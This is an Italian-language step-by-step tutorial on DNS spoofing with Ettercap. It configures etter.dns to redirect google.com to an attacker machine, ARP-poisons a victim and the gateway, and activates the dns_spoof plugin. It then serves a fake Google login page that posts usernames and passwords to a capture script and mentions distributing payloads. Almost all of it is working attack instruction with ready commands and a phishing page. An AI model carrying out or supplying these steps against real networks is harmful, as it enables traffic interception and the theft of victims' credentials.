tags: Web_server web_server_hacking DNS_Server_Hijacking
1. Configurazione del File Hosts per il DNS Spoofing
Il file etter.dns contiene i record che il plugin dns_spoof utilizzerà per reindirizzare le richieste DNS.
Modifica del File etter.dns
-
Apri il file con un editor di testo:
sudo nano /etc/ettercap/etter.dns -
Aggiungi i domini da spoofare e gli IP di destinazione:
google.com A 192.168.1.100 www.google.com A 192.168.1.100 *.example.com A 192.168.1.100Dove
192.168.1.100è l’IP della macchina controllata dall’attaccante (il server malevolo). -
Salva e chiudi il file.
2. Configurazione dell’Avvelenamento ARP
L’attacco DNS Spoofing richiede che l’attaccante si posizioni come “man-in-the-middle” tra la vittima e il gateway della rete.
Avvelenamento ARP con Ettercap
-
Avvia Ettercap in modalità interattiva:
sudo ettercap -G -
Seleziona l’interfaccia di rete:
- Vai su Sniff > Unified Sniffing e seleziona la scheda di rete attiva.
-
Scansione della rete:
- Vai su Hosts > Scan for hosts.
-
Aggiungi le vittime:
- Vai su Hosts > Host list.
- Aggiungi l’IP del gateway come Target 1.
- Aggiungi l’IP della vittima come Target 2.
-
Abilita il forwarding dei pacchetti:
-
Modifica il file
/proc/sys/net/ipv4/ip_forward:echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward
-
3. Attivare il Plugin dns_spoof
-
Abilita il plugin DNS Spoofing:
- Vai su Plugins > Manage the plugins.
- Seleziona e attiva dns_spoof.
-
Inizia l’attacco:
- Vai su Start > Start sniffing.
4. Testare l’Attacco
- Apri un browser sulla macchina vittima e visita un dominio configurato in
etter.dns(ad esempio,google.com). - La vittima dovrebbe essere reindirizzata all’indirizzo IP malevolo specificato.
5. Configurare un Server Malevolo
Per simulare un sito malevolo che cattura credenziali o distribuisce malware, puoi configurare un server HTTP sulla macchina dell’attaccante.
Usare Python per un Server Web
-
Avvia un server web semplice sulla macchina dell’attaccante:
python3 -m http.server 80 -
Posiziona un file HTML malevolo nella directory:
<html> <body> <h1>Benvenuto su Google!</h1> <form action="capture.php" method="post"> Username: <input type="text" name="username"><br> Password: <input type="password" name="password"><br> <input type="submit" value="Login"> </form> </body> </html>
6. Monitoraggio e Raccolta Dati
- Usa Wireshark per catturare i pacchetti DNS e verificare che il traffico venga reindirizzato.
- I dati delle vittime possono essere salvati tramite uno script PHP o registrati direttamente nei log del server.
Riepilogo
- Configura il file
etter.dnsper definire i domini da reindirizzare. - Avvia Ettercap, esegui l’avvelenamento ARP e abilita il plugin
dns_spoof. - Testa il reindirizzamento da parte della vittima.
- Configura un server malevolo per raccogliere informazioni o distribuire payload.